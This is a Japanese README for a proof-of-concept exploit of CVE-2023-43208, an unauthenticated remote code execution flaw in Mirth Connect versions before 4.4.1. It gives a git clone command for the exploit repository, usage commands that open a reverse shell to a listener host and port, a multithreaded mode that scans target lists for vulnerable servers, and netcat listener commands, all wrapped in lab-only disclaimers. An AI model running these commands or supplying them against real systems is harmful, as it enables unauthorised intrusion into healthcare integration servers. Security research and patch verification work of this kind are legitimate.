
CVE-2023-43208(Mirth Connect バージョン4.4.1以前におけるリモートコード実行の脆弱性)の概念実証エクスプロイト。
⚠️ 教育およびラボ使用専用 ⚠️
CVE-2023-43208 の概念実証エクスプロイト。バージョン 4.4.1 未満の Mirth Connect におけるリモートコード実行の脆弱性です。
このツールの使用は厳格に以下に限定されます:
使用禁止:
すべての該当する法律および規制を遵守する責任はあなたにあります。このツールの誤用は刑事告訴につながる可能性があります。
このエクスプロイトは Mirth Connect の /api/users エンドポイントにおける XML デシリアライゼーション脆弱性を標的としており、影響を受けるバージョン(< 4.4.1)で認証なしのリモートコード実行を可能にします。
これは CRITICAL(重大)な脆弱性であり、隔離されたラボ環境で自分のシステムに対してのみテストすべきです。
requirements.txt に記載された必要なパッケージ# リポジトリのクローン
git clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git
cd CVE-2023-43208-EXPLOIT
# 依存関係のインストール
pip install -r requirements.txt
python exploit.py
# 単一ターゲットのエクスプロイト(ラボ使用専用)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444
# ファイルから複数ターゲットをスキャン(ラボ使用専用)
python exploit.py -f targets.txt -t 50 -o vulnerable.txt
# 非インタラクティブモード(ラボ使用専用)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive
-u, --url ターゲットURL(ラボ使用専用)
-lh, --lhost リスニングホスト(自分のIP)
-lp, --lport リスニングポート
-f, --file スキャンするターゲットURLを含むファイル
-o, --output スキャン結果を保存する出力ファイル
-t, --threads スキャンのスレッド数(デフォルト: 50)
--no-interactive 非インタラクティブモードで実行
ラボをセットアップ:
リスナーを起動:
ncat -lnvp 4444
# または
nc -lnvp 4444
ラボ内でエクスプロイトを実行:
python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444
このエクスプロイトは Commons Collections ガジェットを使用して /api/users エンドポイントを通じて RCE を達成します。
もし Mirth Connect を実行している場合:
╔══════════════════════════════════════════════════════════════╗
║ このツールはラボ使用専用です ║
║ 許可なく使用することは違法かつ非倫理的です ║
║ すべてのリスクと責任はあなたが負います ║
║ 作者は誤用に対する一切の責任を負いません ║
╚══════════════════════════════════════════════════════════════╝